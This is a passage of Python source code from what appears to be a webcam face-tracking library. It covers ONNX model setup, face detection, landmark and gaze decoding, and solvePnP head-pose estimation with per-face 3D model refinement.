features["mouth_corner_inout_r"] = self.mouth_corner_inout_r.update(f, now)
else:
features["mouth_corner_inout_r"] = 0.
f = abs(np.mean(pts[[59,60,61], 1], axis=0) - np.mean(pts[[63,64,65], 1], axis=0)) / norm_distance_y
features["mouth_open"] = self.mouth_open.update(f, now)
f = abs(pts[58, 0] - pts[62, 0]) / norm_distance_x
features["mouth_wide"] = self.mouth_wide.update(f, now)
return features
class FaceInfo():
def __init__(self, id, tracker):
self.id = id
self.frame_count = -1
self.tracker = tracker
self.contour_pts = [0,1,8,15,16,27,28,29,30,31,32,33,34,35]
self.face_3d = copy.copy(self.tracker.face_3d)
if self.tracker.model_type == -1:
self.contour_pts = [0,2,8,14,16,27,30,33]
self.reset()
self.alive = False
self.coord = None
self.base_scale_v = self.tracker.face_3d[27:30, 1] - self.tracker.face_3d[28:31, 1]
self.base_scale_h = np.abs(self.tracker.face_3d[[0, 36, 42], 0] - self.tracker.face_3d[[16, 39, 45], 0])
self.limit_3d_adjustment = True
self.update_count_delta = 75.
self.update_count_max = 7500.
if self.tracker.max_feature_updates > 0:
self.features = FeatureExtractor(self.tracker.max_feature_updates)
def reset(self):
self.alive = False
self.conf = None
self.lms = None
self.eye_state = None
self.rotation = None
self.translation = None
self.success = None
self.quaternion = None
self.euler = None
self.pnp_error = None
self.pts_3d = None
self.eye_blink = None
self.bbox = None
self.pnp_error = 0
if self.tracker.max_feature_updates < 1:
self.features = FeatureExtractor(0)
self.current_features = {}
self.contour = np.zeros((21,3))
self.update_counts = np.zeros((66,2))
self.update_contour()
self.fail_count = 0
def update(self, result, coord, frame_count):
self.frame_count = frame_count
if result is None:
self.reset()
else:
self.conf, (self.lms, self.eye_state) = result
self.coord = coord
self.alive = True
def update_contour(self):
self.contour = np.array(self.face_3d[self.contour_pts])
def normalize_pts3d(self, pts_3d):
# Calculate angle using nose
pts_3d[:, 0:2] -= pts_3d[30, 0:2]
alpha = angle(pts_3d[30, 0:2], pts_3d[27, 0:2])
alpha -= np.deg2rad(90)
R = np.matrix([[np.cos(alpha), -np.sin(alpha)], [np.sin(alpha), np.cos(alpha)]])
pts_3d[:, 0:2] = (pts_3d - pts_3d[30])[:, 0:2].dot(R) + pts_3d[30, 0:2]
# Vertical scale
pts_3d[:, 1] /= np.mean((pts_3d[27:30, 1] - pts_3d[28:31, 1]) / self.base_scale_v)
# Horizontal scale
pts_3d[:, 0] /= np.mean(np.abs(pts_3d[[0, 36, 42], 0] - pts_3d[[16, 39, 45], 0]) / self.base_scale_h)
return pts_3d
def adjust_3d(self):
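# Refine this face's personal 3D model by random perturbation: each run multiplies the model
# points by small random factors (within +/-1%), projects both the original and the perturbed
# points with the current pose, and keeps only perturbations that move the projection closer to
# the detected 2D landmarks. Which axes may change depends on the current head pose, and
# update_counts limits how often each point may be adjusted from either viewing direction.
# Accepted changes are blended into face_3d weighted by the per-landmark confidence.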
if self.conf < 0.4 or self.pnp_error > 300:
return
if self.tracker.model_type != -1 and not self.tracker.static_model:
max_runs = 1
eligible = np.delete(np.arange(0, 66), [30])
changed_any = False
update_type = -1
d_o = np.ones((66,))
d_c = np.ones((66,))
for runs in range(max_runs):
r = 1.0 + np.random.random_sample((66,3)) * 0.02 - 0.01
r[30, :] = 1.0
if self.euler[0] > -165 and self.euler[0] < 145:
continue
elif self.euler[1] > -10 and self.euler[1] < 20:
r[:, 2] = 1.0
update_type = 0
else:
r[:, 0:2] = 1.0
if self.euler[2] > 120 or self.euler[2] < 60:
continue
# Enable only one side of the points, depending on direction
elif self.euler[1] < -10:
update_type = 1
r[[0, 1, 2, 3, 4, 5, 6, 7, 17, 18, 19, 20, 21, 31, 32, 36, 37, 38, 39, 40, 41, 48, 49, 56, 57, 58, 59, 65], 2] = 1.0
eligible = [8, 9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 27, 28, 29, 33, 34, 35, 42, 43, 44, 45, 46, 47, 50, 51, 52, 53, 54, 55, 60, 61, 62, 63, 64]
else:
update_type = 1
r[[9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 34, 35, 42, 43, 44, 45, 46, 47, 51, 52, 53, 54, 61, 62, 63], 2] = 1.0
eligible = [0, 1, 2, 3, 4, 5, 6, 7, 8, 17, 18, 19, 20, 21, 27, 28, 29, 31, 32, 33, 36, 37, 38, 39, 40, 41, 48, 49, 50, 55, 56, 57, 58, 59, 60, 64, 65]
if self.limit_3d_adjustment:
eligible = np.nonzero(self.update_counts[:, update_type] < self.update_counts[:, abs(update_type - 1)] + self.update_count_delta)[0]
if eligible.shape[0] <= 0:
break
if runs == 0:
updated = copy.copy(self.face_3d[0:66])
o_projected = np.ones((66,2))
o_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(self.face_3d[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
c = updated * r
c_projected = np.zeros((66,2))
c_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(c[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
changed = False
d_o[eligible] = np.linalg.norm(o_projected[eligible] - self.lms[eligible, 0:2], axis=1)
d_c[eligible] = np.linalg.norm(c_projected[eligible] - self.lms[eligible, 0:2], axis=1)
indices = np.nonzero(d_c < d_o)[0]
if indices.shape[0] > 0:
if self.limit_3d_adjustment:
indices = np.intersect1d(indices, eligible)
if indices.shape[0] > 0:
self.update_counts[indices, update_type] += 1
updated[indices] = c[indices]
o_projected[indices] = c_projected[indices]
changed = True
changed_any = changed_any or changed
if not changed:
break
if changed_any:
# Update weighted by point confidence
weights = np.zeros((66,3))
weights[:, :] = self.lms[0:66, 2:3]
weights[weights > 0.7] = 1.0
weights = 1.0 - weights
update_indices = np.arange(0, 66)
if self.limit_3d_adjustment:
update_indices = np.nonzero(self.update_counts[:, update_type] <= self.update_count_max)[0]
self.face_3d[update_indices] = self.face_3d[update_indices] * weights[update_indices] + updated[update_indices] * (1. - weights[update_indices])
self.update_contour()
self.pts_3d = self.normalize_pts3d(self.pts_3d)
if self.tracker.feature_level == 2:
self.current_features = self.features.update(self.pts_3d[:, 0:2])
self.eye_blink = []
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_r"]), 1))
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_l"]), 1))
elif self.tracker.feature_level == 1:
self.current_features = self.features.update(self.pts_3d[:, 0:2], False)
self.eye_blink = []
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_r"]), 1))
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_l"]), 1))
def get_model_base_path(model_dir):
model_base_path = resolve(os.path.join("models"))
if model_dir is None:
if not os.path.exists(model_base_path):
model_base_path = resolve(os.path.join("..", "models"))
else:
model_base_path = model_dir
return model_base_path
class Tracker():
def __init__(self, width, height, model_type=3, detection_threshold=0.6, threshold=None, max_faces=1, discard_after=5, scan_every=3, bbox_growth=0.0, max_threads=4, silent=False, model_dir=None, no_gaze=False, use_retinaface=False, max_feature_updates=0, static_model=False, feature_level=2, try_hard=False):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = min(max_threads,4)
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.model_type = model_type
self.models = [
"lm_model0_opt.onnx",
"lm_model1_opt.onnx",
"lm_model2_opt.onnx",
"lm_model3_opt.onnx",
"lm_model4_opt.onnx"
]
model = "lm_modelT_opt.onnx"
if model_type >= 0:
model = self.models[self.model_type]
if model_type == -2:
model = "lm_modelV_opt.onnx"
if model_type == -3:
model = "lm_modelU_opt.onnx"
model_base_path = get_model_base_path(model_dir)
if threshold is None:
threshold = 0.6
if model_type < 0:
threshold = 0.87
self.retinaface = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=max(max_threads,4), top_k=max_faces, res=(640, 640))
self.retinaface_scan = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=2, top_k=max_faces, res=(640, 640))
self.use_retinaface = use_retinaface
# Single face instance with multiple threads
self.session = onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options)
# Multiple faces with single threads
self.sessions = []
self.max_workers = max(min(max_threads, max_faces), 1)
extra_threads = max_threads % self.max_workers
for i in range(self.max_workers):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = max_threads // self.max_workers
if options.intra_op_num_threads < 1:
options.intra_op_num_threads = 1
elif i < extra_threads:
options.intra_op_num_threads += 1
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
self.sessions.append(onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options))
self.input_name = self.session.get_inputs()[0].name
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = 1
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.gaze_model = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_gaze32_split_opt.onnx"), sess_options=options)
self.detection = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_detection_opt.onnx"), sess_options=options)
self.faces = []
# Image normalization constants
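# The usual (x / 255 - mean) / std normalization is folded into a single multiply-add so that
# preprocessing can be written as im * std + mean:
#   std' = 1 / (255 * std),  mean' = -mean / std  =>  x * std' + mean' = (x / 255 - mean) / std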
self.mean = np.float32(np.array([0.485, 0.456, 0.406]))
self.std = np.float32(np.array([0.229, 0.224, 0.225]))
self.mean = self.mean / self.std
self.std = self.std * 255.0
self.mean = - self.mean
self.std = 1.0 / self.std
self.mean_32 = np.tile(self.mean, [32, 32, 1])
self.std_32 = np.tile(self.std, [32, 32, 1])
self.mean_224 = np.tile(self.mean, [224, 224, 1])
self.std_224 = np.tile(self.std, [224, 224, 1])
# PnP solving
self.face_3d = np.array([
[ 0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.448998827123556, 0.166995837790733, -0.765143004071253],
[ 0.437431554952677, 0.022655479179981, -0.739267175112735],
[ 0.415033422928434, -0.088941454648772, -0.747947437846473],
[ 0.389123587370091, -0.232380029794684, -0.704788385327458],
[ 0.334630113904382, -0.361265387599081, -0.615587579236862],
[ 0.263725112132858, -0.460009725616771, -0.491479221041573],
[ 0.16241621322721 , -0.558037146073869, -0.339445180872282],
[ 0. , -0.621079019321682, -0.287294770748887],
[-0.16241621322721 , -0.558037146073869, -0.339445180872282],
[-0.263725112132858, -0.460009725616771, -0.491479221041573],
[-0.334630113904382, -0.361265387599081, -0.615587579236862],
[-0.389123587370091, -0.232380029794684, -0.704788385327458],
[-0.415033422928434, -0.088941454648772, -0.747947437846473],
[-0.437431554952677, 0.022655479179981, -0.739267175112735],
[-0.448998827123556, 0.166995837790733, -0.765143004071253],
[-0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0.322196658344302, 0.464439136821772, -0.250558059367669],
[ 0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[ 0.186875436782135, 0.44706071961879 , -0.145299823706503],
[ 0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.186875436782135, 0.44706071961879 , -0.145299823706503],
[-0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[-0.322196658344302, 0.464439136821772, -0.250558059367669],
[-0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0. , 0.293332603215811, -0.137582088779393],
[ 0. , 0.194828701837823, -0.069158109325951],
[ 0. , 0.103844017393155, -0.009151819844964],
[ 0. , 0. , 0. ],
[ 0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.046439347377934, -0.057675223874769, -0.102990627164664],
[ 0. , -0.068753126205604, -0.090545348482397],
[-0.046439347377934, -0.057675223874769, -0.102990627164664],
[-0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.315905195966084, 0.298337502555443, -0.285107407636464],
[ 0.275252345439353, 0.312721904921771, -0.244558251170671],
[ 0.176394511553111, 0.311907184376107, -0.219205360345231],
[ 0.131229723798772, 0.284447361805627, -0.234239149487417],
[ 0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.131229723798772, 0.284447361805627, -0.234239149487417],
[-0.176394511553111, 0.311907184376107, -0.219205360345231],
[-0.275252345439353, 0.312721904921771, -0.244558251170671],
[-0.315905195966084, 0.298337502555443, -0.285107407636464],
[-0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.121155252430729, -0.208988660580347, -0.160606287940521],
[ 0.041356305910044, -0.194484199722098, -0.096159882202821],
[ 0. , -0.205180167345702, -0.083299217789729],
[-0.041356305910044, -0.194484199722098, -0.096159882202821],
[-0.121155252430729, -0.208988660580347, -0.160606287940521],
[-0.132325402795928, -0.290857984604968, -0.187067868218105],
[-0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0. , -0.343742581679188, -0.113925986025684],
[ 0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0.132325402795928, -0.290857984604968, -0.187067868218105],
[ 0.181481567104525, -0.243239316141725, -0.231284988892766],
[ 0.083999507750469, -0.239717753728704, -0.155256465640701],
[ 0. , -0.256058040176369, -0.0950619498899 ],
[-0.083999507750469, -0.239717753728704, -0.155256465640701],
[-0.181481567104525, -0.243239316141725, -0.231284988892766],
[-0.074036069749345, -0.250689938345682, -0.177346470406188],
[ 0. , -0.264945854681568, -0.112349967428413],
[ 0.074036069749345, -0.250689938345682, -0.177346470406188],
# Pupils and eyeball centers
[ 0.257990002632141, 0.276080012321472, -0.219998998939991],
[-0.257990002632141, 0.276080012321472, -0.219998998939991],
[ 0.257990002632141, 0.276080012321472, -0.324570998549461],
[-0.257990002632141, 0.276080012321472, -0.324570998549461]
], np.float32)
self.camera = np.array([[width, 0, width/2], [0, width, height/2], [0, 0, 1]], np.float32)
self.inverse_camera = np.linalg.inv(self.camera)
self.dist_coeffs = np.zeros((4,1))
self.frame_count = 0
self.width = width
self.height = height
self.threshold = threshold
self.detection_threshold = detection_threshold
self.max_faces = max_faces
self.max_threads = max_threads
self.discard = 0
self.discard_after = discard_after
self.detected = 0
self.wait_count = 0
self.scan_every = scan_every
self.bbox_growth = bbox_growth
self.silent = silent
self.try_hard = try_hard
self.res = 224.
self.mean_res = self.mean_224
self.std_res = self.std_224
if model_type < 0:
self.res = 56.
self.mean_res = np.tile(self.mean, [56, 56, 1])
self.std_res = np.tile(self.std, [56, 56, 1])
if model_type < -1:
self.res = 112.
self.mean_res = np.tile(self.mean, [112, 112, 1])
self.std_res = np.tile(self.std, [112, 112, 1])
self.res_i = int(self.res)
self.out_res = 27.
if model_type < 0:
self.out_res = 6.
if model_type < -1:
self.out_res = 13.
self.out_res_i = int(self.out_res) + 1
self.logit_factor = 16.
if model_type < 0:
self.logit_factor = 8.
if model_type < -1:
self.logit_factor = 16.
self.no_gaze = no_gaze
self.debug_gaze = False
self.feature_level = feature_level
if model_type == -1:
self.feature_level = min(feature_level, 1)
self.max_feature_updates = max_feature_updates
self.static_model = static_model
self.face_info = [FaceInfo(id, self) for id in range(max_faces)]
self.fail_count = 0
def detect_faces(self, frame):
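# Coarse face detection on a 224x224 downscaled copy of the frame. The detection model outputs
# a 56x56 confidence heatmap and a radius channel; comparing the heatmap against its max-pooled
# version keeps only local maxima (a simple non-maximum suppression). Peak coordinates are
# scaled by 4 back to 224x224, the radius channel by 112, and the resulting square boxes are
# finally rescaled to the original frame size.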
im = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_LINEAR)[:,:,::-1] * self.std_224 + self.mean_224
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
outputs, maxpool = self.detection.run([], {'input': im})
outputs = np.array(outputs)
maxpool = np.array(maxpool)
outputs[0, 0, outputs[0, 0] != maxpool[0, 0]] = 0
detections = np.flip(np.argsort(outputs[0,0].flatten()))
results = []
for det in detections[0:self.max_faces]:
y, x = det // 56, det % 56
c = outputs[0, 0, y, x]
r = outputs[0, 1, y, x] * 112.
x *= 4
y *= 4
r *= 1.0
if c < self.detection_threshold:
break
results.append((x - r, y - r, 2 * r, 2 * r * 1.0))
results = np.array(results).astype(np.float32)
if results.shape[0] > 0:
results[:, [0,2]] *= frame.shape[1] / 224.
results[:, [1,3]] *= frame.shape[0] / 224.
return results
def landmarks(self, tensor, crop_info):
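# Decode the landmark model output: for each landmark the tensor holds a low-resolution heatmap
# plus x and y offset maps. The heatmap argmax gives the coarse cell, the offsets (mapped
# through logit_arr) give the sub-cell position, and the result is transformed back into frame
# coordinates using the crop origin and scale. The mean heatmap confidence is returned with the
# landmarks; if the three weakest points average below 0.65, that partial average is used
# instead so that poor detections are easier to reject.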
crop_x1, crop_y1, scale_x, scale_y, _ = crop_info
avg_conf = 0
res = self.res - 1
c0, c1, c2 = 66, 132, 198
if self.model_type == -1:
c0, c1, c2 = 30, 60, 90
t_main = tensor[0:c0].reshape((c0,self.out_res_i * self.out_res_i))
t_m = t_main.argmax(1)
indices = np.expand_dims(t_m, 1)
t_conf = np.take_along_axis(t_main, indices, 1).reshape((c0,))
t_off_x = np.take_along_axis(tensor[c0:c1].reshape((c0,self.out_res_i * self.out_res_i)), indices, 1).reshape((c0,))
t_off_y = np.take_along_axis(tensor[c1:c2].reshape((c0,self.out_res_i * self.out_res_i)), indices, 1).reshape((c0,))
t_off_x = res * logit_arr(t_off_x, self.logit_factor)
t_off_y = res * logit_arr(t_off_y, self.logit_factor)
t_x = crop_y1 + scale_y * (res * np.floor(t_m / self.out_res_i) / self.out_res + t_off_x)
t_y = crop_x1 + scale_x * (res * np.floor(np.mod(t_m, self.out_res_i)) / self.out_res + t_off_y)
avg_conf = np.average(t_conf)
lms = np.stack([t_x, t_y, t_conf], 1)
lms[np.isnan(lms).any(axis=1)] = np.array([0.,0.,0.], dtype=np.float32)
if self.model_type == -1:
lms = lms[[0,0,1,1,1,2,2,2,3,3,3,4,4,4,5,5,6,7,7,8,8,9,10,10,11,11,12,21,21,21,22,23,23,23,23,23,13,14,14,15,16,16,17,18,18,19,20,20,24,25,25,25,26,26,27,27,27,24,24,28,28,28,26,29,29,29]]
#lms[[1,3,4,6,7,9,10,12,13,15,18,20,23,25,38,40,44,46]] += lms[[2,2,5,5,8,8,11,11,14,16,19,21,24,26,39,39,45,45]]
#lms[[3,4,6,7,9,10,12,13]] += lms[[5,5,8,8,11,11,14,14]]
#lms[[1,15,18,20,23,25,38,40,44,46]] /= 2.0
#lms[[3,4,6,7,9,10,12,13]] /= 3.0
part_avg = np.mean(np.partition(lms[:,2],3)[0:3])
if part_avg < 0.65:
avg_conf = part_avg
return (avg_conf, np.array(lms))
def estimate_depth(self, face_info):
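# Estimate the head pose and 3D landmark positions. solvePnP fits the reference 3D contour
# points to their detected 2D locations, using the previous pose as the initial guess when one
# is available. Every 2D landmark is then back-projected into 3D using the depth of the
# corresponding reference model point, and the pupil/eyeball points 66-69 are derived from the
# eye corners. A reprojection error computed over the face outline and nose is returned as
# pnp_error and used to detect fitting failures.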
lms = np.concatenate((face_info.lms, np.array([[face_info.eye_state[0][1], face_info.eye_state[0][2], face_info.eye_state[0][3]], [face_info.eye_state[1][1], face_info.eye_state[1][2], face_info.eye_state[1][3]]], np.float32)), 0)
image_pts = np.array(lms)[face_info.contour_pts, 0:2]
success = False
if not face_info.rotation is None:
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=np.transpose(face_info.rotation), tvec=np.transpose(face_info.translation), flags=cv2.SOLVEPNP_ITERATIVE)
else:
rvec = np.array([0, 0, 0], np.float32)
tvec = np.array([0, 0, 0], np.float32)
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=rvec, tvec=tvec, flags=cv2.SOLVEPNP_ITERATIVE)
rotation = face_info.rotation
translation = face_info.translation
pts_3d = np.zeros((70,3), np.float32)
if not success:
face_info.rotation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
return False, np.zeros(4), np.zeros(3), 99999., pts_3d, lms
else:
face_info.rotation = np.transpose(face_info.rotation)
face_info.translation = np.transpose(face_info.translation)
rmat, _ = cv2.Rodrigues(rotation)
inverse_rotation = np.linalg.inv(rmat)
t_reference = face_info.face_3d.dot(rmat.transpose())
t_reference = t_reference + face_info.translation
t_reference = t_reference.dot(self.camera.transpose())
t_depth = t_reference[:, 2]
t_depth[t_depth == 0] = 0.000001
t_depth_e = np.expand_dims(t_depth[:],1)
t_reference = t_reference[:] / t_depth_e
pts_3d[0:66] = np.stack([lms[0:66,0], lms[0:66,1], np.ones((66,))], 1) * t_depth_e[0:66]
pts_3d[0:66] = (pts_3d[0:66].dot(self.inverse_camera.transpose()) - face_info.translation).dot(inverse_rotation.transpose())
pnp_error = np.power(lms[0:17,0:2] - t_reference[0:17,0:2], 2).sum()
pnp_error += np.power(lms[30,0:2] - t_reference[30,0:2], 2).sum()
if np.isnan(pnp_error):
pnp_error = 9999999.
for i, pt in enumerate(face_info.face_3d[66:70]):
if i == 2:
# Right eyeball
# Eyeballs have an average diameter of 12.5mm and the distance between the eye corners is 30-35mm, so a conversion factor of about 0.385 can be applied
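# (12.5 / ((30 + 35) / 2) = 12.5 / 32.5, which is approximately 0.385)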
eye_center = (pts_3d[36] + pts_3d[39]) / 2.0
d_corner = np.linalg.norm(pts_3d[36] - pts_3d[39])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[68] = pt_3d
continue
if i == 3:
# Left eyeball
eye_center = (pts_3d[42] + pts_3d[45]) / 2.0
d_corner = np.linalg.norm(pts_3d[42] - pts_3d[45])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[69] = pt_3d
continue
if i == 0:
d1 = np.linalg.norm(lms[66,0:2] - lms[36,0:2])
d2 = np.linalg.norm(lms[66,0:2] - lms[39,0:2])
d = d1 + d2
pt = (pts_3d[36] * d1 + pts_3d[39] * d2) / d
if i == 1:
d1 = np.linalg.norm(lms[67,0:2] - lms[42,0:2])
d2 = np.linalg.norm(lms[67,0:2] - lms[45,0:2])
d = d1 + d2
pt = (pts_3d[42] * d1 + pts_3d[45] * d2) / d
if i < 2:
reference = rmat.dot(pt)
reference = reference + face_info.translation
reference = self.camera.dot(reference)
depth = reference[2]
pt_3d = np.array([lms[66+i][0] * depth, lms[66+i][1] * depth, depth], np.float32)
pt_3d = self.inverse_camera.dot(pt_3d)
pt_3d = pt_3d - face_info.translation
pt_3d = inverse_rotation.dot(pt_3d)
pts_3d[66+i,:] = pt_3d[:]
pts_3d[np.isnan(pts_3d).any(axis=1)] = np.array([0.,0.,0.], dtype=np.float32)
pnp_error = np.sqrt(pnp_error / (2.0 * image_pts.shape[0]))
if pnp_error > 300:
face_info.fail_count += 1
if face_info.fail_count > 5:
# Something went wrong with adjusting the 3D model
if not self.silent:
print(f"Detected anomaly when 3D fitting face {face_info.id}. Resetting.")
face_info.face_3d = copy.copy(self.face_3d)
face_info.rotation = None
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.update_counts = np.zeros((66,2))
face_info.update_contour()
else:
face_info.fail_count = 0
euler = cv2.RQDecomp3x3(rmat)[0]
return True, matrix_to_quaternion(rmat), euler, pnp_error, pts_3d, lms
def preprocess(self, im, crop):
x1, y1, x2, y2 = crop
im = np.float32(im[y1:y2, x1:x2,::-1]) # Crop and BGR to RGB
im = cv2.resize(im, (self.res_i, self.res_i), interpolation=cv2.INTER_LINEAR) * self.std_res + self.mean_res
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
return im
def equalize(self, im):
im_yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV)
im_yuv[:,:,0] = cv2.equalizeHist(im_yuv[:,:,0])
return cv2.cvtColor(im_yuv, cv2.COLOR_YUV2BGR)
def corners_to_eye(self, corners, w, h, flip):
((cx1, cy1), (cx2, cy2)) = corners
c1 = np.array([cx1, cy1])
c2 = np.array([cx2, cy2])
c2, a = compensate(c1, c2)
center = (c1 + c2) / 2.0
radius = np.linalg.norm(c1 - c2) / 2.0
radius = np.array([radius * 1.4, radius * 1.2])
upper_left = clamp_to_im(center - radius, w, h)
lower_right = clamp_to_im(center + radius, w, h)
return upper_left, lower_right, center, radius, c1, a
def prepare_eye(self, frame, full_frame, lms, flip):
outer_pt = tuple(lms[0])
inner_pt = tuple(lms[1])
h, w, _ = frame.shape
(x1, y1), (x2, y2), center, radius, reference, a = self.corners_to_eye((outer_pt, inner_pt), w, h, flip)
im = rotate_image(frame[:, :, ::], a, reference)
im = im[int(y1):int(y2), int(x1):int(x2),:]
if np.prod(im.shape) < 1:
return None, None, None, None, None, None
if flip:
im = cv2.flip(im, 1)
scale = np.array([(x2 - x1), (y2 - y1)]) / 32.
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_LINEAR)
#im = self.equalize(im)
if self.debug_gaze:
if not flip:
full_frame[0:32, 0:32] = im
else:
full_frame[0:32, 32:64] = im
im = im.astype(np.float32)[:,:,::-1] * self.std_32 + self.mean_32
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,2,1))
return im, x1, y1, scale, reference, a
def extract_face(self, frame, lms):
lms = np.array(lms)[:,0:2][:,::-1]
x1, y1 = tuple(lms.min(0))
x2, y2 = tuple(lms.max(0))
radius_x = 1.2 * (x2 - x1) / 2.0
radius_y = 1.2 * (y2 - y1) / 2.0
radius = np.array((radius_x, radius_y))
center = (np.array((x1, y1)) + np.array((x2, y2))) / 2.0
w, h, _ = frame.shape
x1, y1 = clamp_to_im(center - radius, h, w)
x2, y2 = clamp_to_im(center + radius + 1, h, w)
offset = np.array((x1, y1))
lms = (lms[:, 0:2] - offset).astype(int)
frame = frame[y1:y2, x1:x2]
return frame, lms, offset
def get_eye_state(self, frame, lms):
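# Estimate pupil positions (and nominally eye openness) for both eyes. Each eye region is
# cropped around its corner landmarks, rotated so the corners are level, resized to 32x32 and
# fed to the gaze model. Its 8x8 heatmap plus offset channels are decoded like the landmark
# heatmaps, and the resulting pupil coordinates are rotated and translated back into full-frame
# coordinates. The openness value is currently hardcoded to 1 (open).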
if self.no_gaze:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
lms = np.array(lms)
e_x = [0,0]
e_y = [0,0]
scale = [0,0]
reference = [None, None]
angles = [0, 0]
face_frame, lms, offset = self.extract_face(frame, lms)
(right_eye, e_x[0], e_y[0], scale[0], reference[0], angles[0]) = self.prepare_eye(face_frame, frame, np.array([lms[36,0:2], lms[39,0:2]]), False)
(left_eye, e_x[1], e_y[1], scale[1], reference[1], angles[1]) = self.prepare_eye(face_frame, frame, np.array([lms[42,0:2], lms[45,0:2]]), True)
if right_eye is None or left_eye is None:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
both_eyes = np.concatenate((right_eye, left_eye))
results = None
results = self.gaze_model.run([], {self.input_name: both_eyes})
open = [0, 0]
open[0] = 1#results[1][0].argmax()
open[1] = 1#results[1][1].argmax()
results = np.array(results[0])
eye_state = []
for i in range(2):
m = int(results[i][0].argmax())
x = m // 8
y = m % 8
conf = float(results[i][0][x,y])
off_x = 32.0 * logit(results[i][1][x, y], 8.0)
off_y = 32.0 * logit(results[i][2][x, y], 8.0)
eye_x = 32.0 * float(x) / 8.0 + off_x
eye_y = 32.0 * float(y) / 8.0 + off_y
if self.debug_gaze:
if i == 0:
frame[int(eye_y), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), int(eye_x+1)] = (0, 0, 255)
else:
frame[int(eye_y), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), 32+int(eye_x+1)] = (0, 0, 255)
if i == 0:
eye_x = e_x[i] + scale[i][0] * eye_x
else:
eye_x = e_x[i] + scale[i][0] * (32. - eye_x)
eye_y = e_y[i] + scale[i][1] * eye_y
eye_x, eye_y = rotate(reference[i], (eye_x, eye_y), -angles[i])
eye_x = eye_x + offset[0]
eye_y = eye_y + offset[1]
eye_state.append([open[i], eye_y, eye_x, conf])
eye_state = np.array(eye_state)
eye_state[np.isnan(eye_state).any(axis=1)] = np.array([1.,0.,0.,0.], dtype=np.float32)
return eye_state
def assign_face_info(self, results):
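# Assign detection results to the persistent FaceInfo slots. With a single face this is
# trivial; otherwise each result is matched greedily to the face slot whose last known center
# coordinate is closest, and slots that receive no result this frame are reset.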
if self.max_faces == 1 and len(results) == 1:
conf, (lms, eye_state), conf_adjust = results[0]
self.face_info[0].update((conf - conf_adjust, (lms, eye_state)), np.array(lms)[:, 0:2].mean(0), self.frame_count)
return
result_coords = []
adjusted_results = []
for conf, (lms, eye_state), conf_adjust in results:
